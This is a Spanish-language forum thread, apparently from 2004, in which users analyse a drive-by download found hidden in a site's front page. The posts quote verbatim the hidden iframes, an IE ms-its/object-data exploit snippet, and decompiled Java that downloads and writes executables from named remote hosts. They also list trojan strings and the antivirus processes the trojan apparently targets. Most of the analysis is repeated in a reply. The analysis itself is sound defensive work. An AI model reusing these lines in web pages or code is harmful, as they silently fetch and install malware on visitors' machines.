por
pobrecito hablador
el Sábado, 03 Julio de 2004, 06:03h
(#322474)
<IFRAME SRC="http://www.TryToImproveSecurity.com/fa/?d=get " WIDTH=1 HEIGHT=1></IFRAME>
Esa es la linea que hace saltar el antivirus.
Si vamos a esa direccion encontramos otros dos iframes:
<iframe src="http://213.159.117.133/dl/fox.php" width=1 height=1></iframe>
<iframe src="http://counter.sexmaniack.com/newtest.php" width=1 height=1></iframe>
El segundo link nos dice que no hay nada ahi, pero si vemos el source:
<APPLET ARCHIVE='proc.jar' CODE='MainApp.class' WIDTH=1 HEIGHT=1></APPLET>
Menos mal que no hay nada. Dentro de los .class se puede ver que hay algo codificado en base64 que luego pasara a ser decodificado. Me quedo con estas lineas que son bastante descriptivas:
s2 = "C:\\";
String s3 = s2 + "msvb_" + s + ".exe";
En el primer iframe, tenemos un link a redir.php que devuelve:
Location: URL:ms-its:C:\WINDOWS\Help\iexplore.chm::/iegetsrt .htm
En el source podemos encontrar:
<textarea id="cxw" style="display:none;">
<object data="${PR}" type="text/x-scriptlet"></object>
</textarea>
document.write(cxw.value.replace(/\${PR}/g,'&# 109;s-its:mhtml:file://c:\\nosuch.mht!http://213.1 59.117.133/dl/fox/x.chm::/x.htm'));
<applet width=1 height=1 ARCHIVE=loaderfox.jar code=Counter>
Parece que intentan explotar la vulnerabilidad del object-data del IE. Decompilando los class encontramos strings interesantes:
URL url1 = new URL("http://64.127.104.144/progs/loadfox.exe");
FileOutputStream fileoutputstream = new FileOutputStream(s4 + "\\loadnew.exe");
URL url2 = new URL("http://213.159.117.133/dl/cheatfox.php");
El ejecutable esta comprimido en upx, despues de descomprimirlo se pueden encontrar numerosas strings de este estilo:
No quiero seguir gastando mas tiempo en esto, aparte que no tengo ningun windows a mano. Si alguien quiere continuar donde lo he dejado y con un debugger averiguar que hace exactamente el programa (seguro que nada bueno), adelante.
Y la pregunta final: porque esta esa linea que nos ha llevado a todo esto en esa web? Fue escrita de forma intencionada?
Hemos quitado el enlace de la portada, y estamos itentando averiguar qué ha pasado con esa línea. Que está escrita de forma intencionada parece evidente (o quizá no, que hayan sido millones de monos con millones de máquinas de escribir), la cuestión es "¿por quién?".
Por último, es un exploit tan trabajado como cabrón. El tío que nos escribió usaba Explorer, pero a Mozilla/win también intenta instalarle un troyano, solo que parece que otro distinto.
Re:Casi me infectas
(Puntos:0)Esa es la linea que hace saltar el antivirus.
Si vamos a esa direccion encontramos otros dos iframes:
<iframe src="http://213.159.117.133/dl/fox.php" width=1 height=1></iframe>
<iframe src="http://counter.sexmaniack.com/newtest.php" width=1 height=1></iframe>
El segundo link nos dice que no hay nada ahi, pero si vemos el source:
<APPLET ARCHIVE='proc.jar' CODE='MainApp.class' WIDTH=1 HEIGHT=1></APPLET>
Menos mal que no hay nada. Dentro de los .class se puede ver que hay algo codificado en base64 que luego pasara a ser decodificado. Me quedo con estas lineas que son bastante descriptivas:
s2 = "C:\\";
String s3 = s2 + "msvb_" + s + ".exe";
En el primer iframe, tenemos un link a redir.php que devuelve:
Location: URL:ms-its:C:\WINDOWS\Help\iexplore.chm::/iegetsrt .htm
En el source podemos encontrar:
<textarea id="cxw" style="display:none;">
<object data="${PR}" type="text/x-scriptlet"></object>
</textarea>
document.write(cxw.value.replace(/\${PR}/g,'&# 109;s-its:mhtml:file://c:\\nosuch.mht!http://213.1 59.117.133/dl/fox/x.chm::/x.htm'));
<applet width=1 height=1 ARCHIVE=loaderfox.jar code=Counter>
Parece que intentan explotar la vulnerabilidad del object-data del IE. Decompilando los class encontramos strings interesantes:
URL url1 = new URL("http://64.127.104.144/progs/loadfox.exe");
FileOutputStream fileoutputstream = new FileOutputStream(s4 + "\\loadnew.exe");
URL url2 = new URL("http://213.159.117.133/dl/cheatfox.php");
El ejecutable esta comprimido en upx, despues de descomprimirlo se pueden encontrar numerosas strings de este estilo:
\system32\secure32.txt
\seksdialer.exe
klfox.php
kluniqfox.php
\test
mstasks2.txt
\mstasks2.exe
mstasks1.txt
\mstasks1.exe
toolbar.txt
\toolbar.exe
dkserver.txt
\system32\explorer.exe
secure33.php
\system32\secure33.txt
wintime128.txt
\system32\wintime.exe
dkdial.txt
\dkdial.exe
dial32.php
\dial32.exe
InternetGetConnectedState
wininet.dll
MCUPDATE.EXE
CFIAUDIT.EXE
AVXQUAR.EXE
AUTOUPDATE.EXE
AUTOTRACE.EXE
AUTODOWN.EXE
AUPDATE.EXE
NUPGRADE.EXE
UPDATE.EXE
ICSUPP95.EXE
[...]
No quiero seguir gastando mas tiempo en esto, aparte que no tengo ningun windows a mano. Si alguien quiere continuar donde lo he dejado y con un debugger averiguar que hace exactamente el programa (seguro que nada bueno), adelante.
Y la pregunta final: porque esta esa linea que nos ha llevado a todo esto en esa web? Fue escrita de forma intencionada?
Re:Casi me infectas
(Puntos:2)( Última bitácora: Jueves, 29 Diciembre de 2011, 04:53h )
Por último, es un exploit tan trabajado como cabrón. El tío que nos escribió usaba Explorer, pero a Mozilla/win también intenta instalarle un troyano, solo que parece que otro distinto.